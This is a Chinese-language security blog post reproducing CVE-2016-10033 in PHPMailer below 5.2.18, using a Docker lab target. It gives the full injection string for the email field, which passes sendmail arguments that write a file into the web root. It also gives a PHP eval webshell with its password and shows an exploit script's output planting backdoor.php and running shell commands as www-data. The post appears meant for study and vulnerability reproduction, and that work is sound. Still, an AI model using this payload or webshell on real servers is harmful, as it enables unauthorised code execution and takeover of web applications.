PHPMailer遠端命令執行漏洞復現

thelostworld-公眾號發表於2020-12-31

PHPMailer遠端命令執行漏洞復現

一、漏洞簡介

PHPMailer是PHP電子郵件建立及傳輸類，用於多個開源專案：WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。

PHPMailer < 5.2.18版本存在安全漏洞，可使未經身份驗證的遠端攻擊者在Web伺服器使用者上下文中執行任意程式碼，遠端控制目標web應用。

二、影響版本：

PHPMailer<5.2.18

三、漏洞復現

Docker環境：

dockerrun --rm -it -p8080:80vulnerables/cve-2016-10033

拉去映象啟動環境：

http://192.168.1.107:8080/

http://192.168.1.107:8080/在name處隨便輸入比如“aaa”，在email處輸入："aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com在message處輸入一句話木馬：<?php@eval($_POST['thelostworld']);?>

上傳完一句話木馬後，頁面會響應3-5分鐘，響應時間較長

木馬地址：http://192.168.1.107:8080/a.php 密碼：thelostworld

虛擬終端：

使用指令碼：

獲取指令碼後臺回覆“PHPMailer”獲取指令碼

➜ Desktop ./exploit.sh192.168.1.107:8080[+] CVE-2016-10033exploitbyopsxcq[+] Exploiting192.168.1.107:8080[+] Target exploited, acessing shell at http://192.168.1.107:8080/backdoor.php[+] Checkingifthe backdoor was createdontarget system[+] Backdoor.php foundonremote system[+] Running whoamiwww-dataRemoteShell> [+] Running RemoteShell> id[+] Running iduid=33(www-data) gid=33(www-data) groups=33(www-data)

訪問木馬地址：

http://192.168.1.107:8080/backdoor.php

參考：

https://www.cnblogs.com/Hi-blog/p/7812008.html

https://www.exploit-db.com/exploits/40968

免責宣告：本站提供安全工具、程式(方法)可能帶有攻擊性，僅供安全研究與教學之用，風險自負!

轉載宣告：著作權歸作者所有。商業轉載請聯絡作者獲得授權，非商業轉載請註明出處。

訂閱檢視更多復現文章、學習筆記

thelostworld

安全路上，與你並肩前行！！！！

個人知乎：https://www.zhihu.com/people/fu-wei-43-69/columns

個人簡書：https://www.jianshu.com/u/bf0e38a8d400

個人CSDN：https://blog.csdn.net/qq_37602797/category_10169006.html

個人部落格園：https://www.cnblogs.com/thelostworld/

FREEBUF主頁：https://www.freebuf.com/author/thelostworld?type=article

歡迎新增本公眾號作者微信交流，新增時備註一下“公眾號”

相關文章

ThinkPHP 5.x 遠端命令執行漏洞分析與復現
2018-12-17
PHP
CVE-2017-8464 遠端命令執行漏洞復現
2018-01-22
CVE-2017-8464遠端命令執行漏洞復現
2018-05-25
Apache SSI 遠端命令執行漏洞
2020-10-05
Apache
Apache log4j2 遠端程式碼執行漏洞復現?
2021-12-14
Apache
遠端執行命令
2016-09-06
Weblogic修復"Java反序列化"過程遠端命令執行漏洞
2017-07-25
WebJava
Go實現ssh執行遠端命令及遠端終端
2020-12-20
Go
CNVD-2018-01084 漏洞復現報告（service.cgi 遠端命令執行漏洞）
2022-04-12
Firefox 31~34遠端命令執行漏洞的分析
2020-08-19
Firefox
CVE-2018-1273 Spring Data Commons 遠端命令執行漏洞復現
2021-01-21
Spring
Apache struts2遠端命令執行_CVE-2017-9805(S2-052)漏洞復現
2019-07-16
Apache
【安全公告】Spring Core遠端命令執行漏洞預警
2022-03-30
Spring
Windows漏洞：MS08-067遠端程式碼執行漏洞復現及深度防禦
2021-11-16
Windows
ThinkPHP遠端程式碼執行漏洞
2019-09-12
PHP
phpunit 遠端程式碼執行漏洞
2020-10-16
PHP
PKAV 發現 Struts2 最新遠端命令執行漏洞（S2-037）
2020-08-19
Joomla遠端程式碼執行漏洞分析
2020-08-19
OOM
OpenWRT 曝遠端程式碼執行漏洞
2020-02-03
CVE-2017-7269 IIS6.0遠端程式碼執行漏洞復現
2019-05-20
最新漏洞：Spring Framework遠端程式碼執行漏洞
2022-03-31
SpringFramework
RCE(遠端程式碼執行漏洞)原理及漏洞利用
2022-03-17
高危漏洞！Apache Log4j 遠端程式碼執行漏洞（附修復建議）
2021-12-10
Apache
xxl-job預設accessToken命令執行漏洞復現
2023-11-02
什麼是遠端程式碼執行漏洞?
2022-07-07
ThinkPHP 5.0.23 遠端程式碼執行漏洞
2024-04-19
PHP
Apache Kylin遠端程式碼執行漏洞復現（CVE-2020-1956）
2020-11-08
Apache
Apache Struts2遠端程式碼執行漏洞(S2-001)復現總結
2020-10-06
Apache
Apache struts2 namespace遠端命令執行_CVE-2018-11776(S2-057)漏洞復現
2019-07-18
Apachenamespace
GitLab存在嚴重漏洞，允許透過Github匯入實現遠端命令執行
2022-08-25
GitlabGithub
Steam客戶端發現遠端程式碼執行漏洞：已放補丁
2018-06-06
客戶端
Saltstack系列2：Saltstack遠端執行命令
2019-10-19
Windows命令遠端執行工具Winexe
2017-08-02
Windows
令無數程式設計師加班的 Log4j2 遠端執行漏洞復現
2021-12-12
程式設計師
Chrome 77釋出，修復遠端程式碼執行漏洞！請儘快更新！
2019-09-20
Chrome
VxWorks釋出安全更新修復多個高危遠端程式碼執行漏洞
2019-07-30
Discuz! X系列遠端程式碼執行漏洞分析
2020-08-19
.NET Remoting 遠端程式碼執行漏洞探究
2020-08-19
REM